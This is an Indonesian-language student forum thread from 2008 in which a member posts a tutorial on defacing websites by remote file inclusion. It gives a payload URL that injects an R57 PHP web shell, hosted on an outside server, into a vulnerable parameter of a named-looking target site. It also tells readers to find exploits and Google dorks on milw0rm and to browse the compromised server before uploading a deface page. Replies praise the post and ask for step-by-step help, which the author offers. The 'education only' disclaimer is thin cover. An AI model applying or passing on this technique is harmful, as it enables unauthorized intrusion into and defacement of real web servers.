UNKLAB FORUM

Forum Mahasiswa & Alumni Universitas Klabat
 
HomeSearchRegisterLog in

Share
 

 Teknik Hacking RFI

Go down 
AuthorMessage
y0ng_en9el
Pro
Pro


Male Number of posts : 919
Age : 34
Location : In your heart
Points : 78
Registration date : 2008-06-10

Teknik Hacking RFI Empty
PostSubject: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeSat Aug 09, 2008 11:25 pm

BT malam mimgguan gak ama cewek Laughing lansung terpikir mau buat tutorial Hacking dengan menggunakan PHP Shell. Da lama gak ngehack, ni atik cuma minta target pa tmn, lagian ini cuma buat edukasi doank. OK.
Ketemu lg dengan Engel Laughing bahas tentang cara Deface menggunakan PHP Shell R57 Smile Sekarang kita cari bug (hole/lubang buat kita masuk ke server Target) nya. Klo atik biasanya .Cari di Milw0rm. Cari yang "remote" yak… Why ??? Coz mang kita mo masuk server target melalui remote (tidak melalui server target secara langsung). Cari yang "remote file inclusion" or "multiply remote file inclusion". Klo da dapat,,bagus lah Very Happy Masukkan dork nya di google or search engine contoh google. Terus ikuti langkah2 yang ada di bugnya. Biasanya sih suruh nambahin ja file inject (R57 dalam kasus ne) di belakang file yang vuln. Contoh : " http://target.com/appserv/main.php?appserv_root=php shell ". appserv/main.php?appserv_root= adalah file yang vuln beserta variablenya, sedangkan PHP Shell adalah script yg skrg ak pake R57 Jangan lupa tambahin "?" (tanda tanya, tanpa petik). Kenapa ?? Karena R57tersebut sebenarnya adalah file PHP yang kita simpan sebagai file "txt".
Contoh : http://tmr.thu.edu.tw//appserv/main.php?appserv_root=http://h1.badwaresite.www/mikmok/shell/r57.txt?
Teknik Hacking RFI 1
Ok da lihat, pemampilannya. Jalan˛ dulu lihat isi servernya sapa tau ada yg mantap˛ Laughing trus sebelum itu jgn lupa buat script htmlnya, sebelum di upload. Ok. Dan silakan lihat hasilnya Laughing

Teknik Hacking RFI 2

Kayaknya gitu cara deface menggunakan PHP Shell R57 Very Happy. Ingat ni cuma edukasi doank alias nambah pengetahuan. Ngedeface OVER itu gak baik, gunakan hacking utk kebaikan ( hacking ibarat pisau, di satu sisi bisa digunakan utk keperluan rumah tangga contoh : dapur , tp di satu sisi bisa melukai org ) Weiss.. file indexnya jangan dirubah atau di delete ya, coz kasian adminnya.

Ok sampe disini pencerahan atik soal Deface.

Thanks to : cliff, animonzter, sacrofia, CR7, M_Negro, Anime, Cokiki, Moon_Lee dan member˛ UK
Back to top Go down
http://hikari-community.co.nr
CLiFF
Administrator
Administrator
CLiFF

Male Number of posts : 564
Age : 33
Location : Anywhere...
Points : 10009
Registration date : 2008-06-03

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeMon Aug 11, 2008 4:50 pm

mantap bro....

_________________
Einstein said "The true definition of stupidity is to do the same thing time and again and expect a different outcome."

Teknik Hacking RFI 130



http://unklab.forum.st/
Back to top Go down
http://unklab.forum.st
sacrofia
Moderator
Moderator
sacrofia

Male Number of posts : 460
Age : 30
Location : Jushin
Points : 4
Registration date : 2008-06-07

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeThu Aug 14, 2008 7:48 am

mantap dah,
walaupun banyak istilah yang nda di mengerti Pusing
Back to top Go down
http://heavenbb.forumsland.com
y0ng_en9el
Pro
Pro


Male Number of posts : 919
Age : 34
Location : In your heart
Points : 78
Registration date : 2008-06-10

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeThu Aug 14, 2008 5:59 pm

sacrofia wrote:
mantap dah,
walaupun banyak istilah yang nda di mengerti Pusing


yang gak ngerti apa mas ?? Laughing, sapa tau atik bisa bantu
Back to top Go down
http://hikari-community.co.nr
CLiFF
Administrator
Administrator
CLiFF

Male Number of posts : 564
Age : 33
Location : Anywhere...
Points : 10009
Registration date : 2008-06-03

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeThu Aug 14, 2008 7:16 pm

sacrofia wrote:
mantap dah,
walaupun banyak istilah yang nda di mengerti Pusing

iko jo dpe cara2... pasti jadi...

nga nda mangarti lantaran blum coba

_________________
Einstein said "The true definition of stupidity is to do the same thing time and again and expect a different outcome."

Teknik Hacking RFI 130



http://unklab.forum.st/
Back to top Go down
http://unklab.forum.st
sacrofia
Moderator
Moderator
sacrofia

Male Number of posts : 460
Age : 30
Location : Jushin
Points : 4
Registration date : 2008-06-07

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeSat Aug 16, 2008 7:25 am

cliff wrote:


iko jo dpe cara2... pasti jadi...

nga nda mangarti lantaran blum coba
iya sih
Teknik Hacking RFI AddEmoticons04224

y0ng_en9el wrote:



yang gak ngerti apa mas ?? Laughing, sapa tau atik bisa bantu
remote di sini apa artinya, terus yang "remote file inclusion" dan "multiply remote file inclusion" juga.
sebenarnya mo coba sih, tapi bingung langkah pertamanya yang mana . . . !?
bisa di jelaskan lagi nda ( klo perlu pake langkah per langkah)
Teknik Hacking RFI AddEmoticons04226
Back to top Go down
http://heavenbb.forumsland.com
y0ng_en9el
Pro
Pro


Male Number of posts : 919
Age : 34
Location : In your heart
Points : 78
Registration date : 2008-06-10

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeSat Aug 16, 2008 5:52 pm

sacrofia wrote:

remote di sini apa artinya, terus yang "remote file inclusion" dan "multiply remote file inclusion" juga.
sebenarnya mo coba sih, tapi bingung langkah pertamanya yang mana . . . !?
bisa di jelaskan lagi nda ( klo perlu pake langkah per langkah)

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. ( sebenarnya multiply remote file inclusion sama aja dengan remote file inclusion, beda˛ tipis kwa Laughing )

Langkah pertama, cari exploit & dork, web shell/php shell dan script html << itu yg paling inti dari hacking RFI.
Langkah kedua, buka search engine yang tersedia pada situs˛
Back to top Go down
http://hikari-community.co.nr
sacrofia
Moderator
Moderator
sacrofia

Male Number of posts : 460
Age : 30
Location : Jushin
Points : 4
Registration date : 2008-06-07

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeSat Aug 16, 2008 7:39 pm

y0ng_en9el wrote:
Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. ( sebenarnya multiply remote file inclusion sama aja dengan remote file inclusion, beda˛ tipis kwa Laughing )

Langkah pertama, cari exploit & dork, web shell/php shell dan script html << itu yg paling inti dari hacking RFI.
Langkah kedua, buka search engine yang tersedia pada situs˛

oh, kirain remote itu maksudnya bisa mengendalikan suatu web Razz

thanks udah ada langkah2nya . . .
but . . .
bagaimana tuh caranya cari exploit & dork, . . .
maap2 masih awam sih Razz
Back to top Go down
http://heavenbb.forumsland.com
y0ng_en9el
Pro
Pro


Male Number of posts : 919
Age : 34
Location : In your heart
Points : 78
Registration date : 2008-06-10

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeSat Aug 16, 2008 7:47 pm

cari aja di milw0rm banyak tuh disitu <<<
Back to top Go down
http://hikari-community.co.nr
moon_lee
Moderator
Moderator
moon_lee

Female Number of posts : 433
Age : 32
Location : BITOENG CITY ^^
Points : 54
Registration date : 2008-07-24

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeFri Aug 22, 2008 2:41 am

jah...kita kira hacking RF!!!! lol! lol!

engell...bilang kata mo kase ajarr pa qt... tongue

bgmanaa eeee.....
Back to top Go down
y0ng_en9el
Pro
Pro


Male Number of posts : 919
Age : 34
Location : In your heart
Points : 78
Registration date : 2008-06-10

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeFri Aug 22, 2008 12:15 pm

moon_lee wrote:
jah...kita kira hacking RF!!!! lol! lol!

engell...bilang kata mo kase ajarr pa qt... tongue

bgmanaa eeee.....

Ohh iyo kote engel lupa... sorry Sad

engel p waktu banyak, klo moon_lee perlu calling/sms pa engel, nanti engel siap menuju ke TKP Laughing mo ba ajar p Moon. OK cheers
Back to top Go down
http://hikari-community.co.nr
moon_lee
Moderator
Moderator
moon_lee

Female Number of posts : 433
Age : 32
Location : BITOENG CITY ^^
Points : 54
Registration date : 2008-07-24

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeFri Aug 22, 2008 12:32 pm

ditunggu kalow gituuu cheers
Back to top Go down
bronkolous
Newbie
Newbie
bronkolous

Male Number of posts : 20
Age : 33
Location : in house
Points : 0
Registration date : 2008-10-04

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeSat Oct 04, 2008 4:46 pm

bos bolehstou se ajar p kita ini..

aku hanyalah orang bias yang tidak tau apa"
Back to top Go down
y0ng_en9el
Pro
Pro


Male Number of posts : 919
Age : 34
Location : In your heart
Points : 78
Registration date : 2008-06-10

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeSat Oct 04, 2008 6:40 pm

bronkolous wrote:
bos bolehstou se ajar p kita ini..

aku hanyalah orang bias yang tidak tau apa"

Sama˛ kita belajar pak Teknik Hacking RFI 68368
Back to top Go down
http://hikari-community.co.nr
bronkolous
Newbie
Newbie
bronkolous

Male Number of posts : 20
Age : 33
Location : in house
Points : 0
Registration date : 2008-10-04

Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitimeSun Oct 05, 2008 3:05 am

oke dang...
Back to top Go down
Sponsored content




Teknik Hacking RFI Empty
PostSubject: Re: Teknik Hacking RFI   Teknik Hacking RFI I_icon_minitime

Back to top Go down
 
Teknik Hacking RFI
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
UNKLAB FORUM :: KLABAT UNIVERSITY :: Computer Science Faculty :: Computer Security :: Hacking, Cracking, Etc.-
Jump to: